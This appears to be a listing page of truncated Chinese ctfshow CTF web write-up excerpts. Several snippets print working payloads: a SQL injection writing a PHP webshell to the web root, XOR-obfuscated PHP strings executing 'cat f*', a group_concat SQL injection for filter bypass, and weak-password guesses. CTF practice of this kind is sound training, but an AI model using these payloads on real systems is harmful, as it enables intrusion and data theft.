>" into outfile "/var/www/html/a.php"%23&userpwd=b 3.web303 这题进行了长度限制,所以写木马和上题的payload登录都是不行的 if(strlen($username)>6){ die(); } 尝试弱口令 admin 123456 admin admin 登录成功 admin admin888 在dpt.php发现注入点 id位置不知道在哪 继续审计,在dptadd.php发现注...
FastCGI协议 在静态网站中,WEB 容器如 Apache、Nginx 相当于内容分发员的角色, 根据用户请求的页面从网站根目录中返回给用户;而在动态网站中,WEB 容器例如 Apache 会根据用户的请求进行简单处理后交给 php 解释器;当 Apache 收到用户对 index.php 的请求后,如果使用的是 CGI,会启动对应的 CGI 程序,对应在这里就...
Web22 推荐用OneForAll爆破 项目地址:GitHub - shmilylty/OneForAll: OneForAll是一款功能强大的子域收集工具 或者用在线子域名爆破网站:http://z.zcjun.com/ flag{ctf_show_web} Web23 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:43:51 # @Last Modified ...
2.web142 payload: v1=0 3.web143 过滤了取反,+,-等符号,还可以用或异或等运算 重新用脚本生成payload payload: #system('cat f*')v1=1&v2=1&v3=*("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%03%01%0b%00%06%00"^"%60%60%7f%20%60%2a")* 4.web144 和上题类似 #sy...
/system36d/users.php?action=evilFunction&m=getenv&key=flag_649=ctfshow{9ad80fcc305b58afbb3a0c2097ac40ef} Web651 找到函数 array_key_exists(string|int $key, array $array): bool 数组里有键 key 时,array_key_exists() 返回 true。 key 可以是任何能作为数组索引的值。get_object_vars(object ...
web304 增加了全局waf function sds_waf($str){ return preg_match('/[0-9]|[a-z]|-/i', $str); } 但是还是可以注入。 payload: dpt_name=1',sds_address =(select group_concat(flag) from sds_flaag)# web305 多了waf: function sds_waf($str){ if(preg_match('/\~|\`|\!|\@|\...
web647 读取的page.php刚开始看到一个传参点,sqlmap跑一下 image-20230805153432337 存在注入 image-20230805153546825 在ctfshow_secret这个表里得到了一个flag image-20230805153703206 得到了key key_is_here_you_know image-20230805153840718 继续回过头,刚才的user.php的源码其实是有647的cat,看一下如何满足条件 image...
Web安全 本文主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点... 南城夕雾 413620围观·8·242022-02-13 CTF中PHP相关题目考点总结(上)原创 Web安全 本文总结了ctfshow题目中遇到的关于PHP的考点。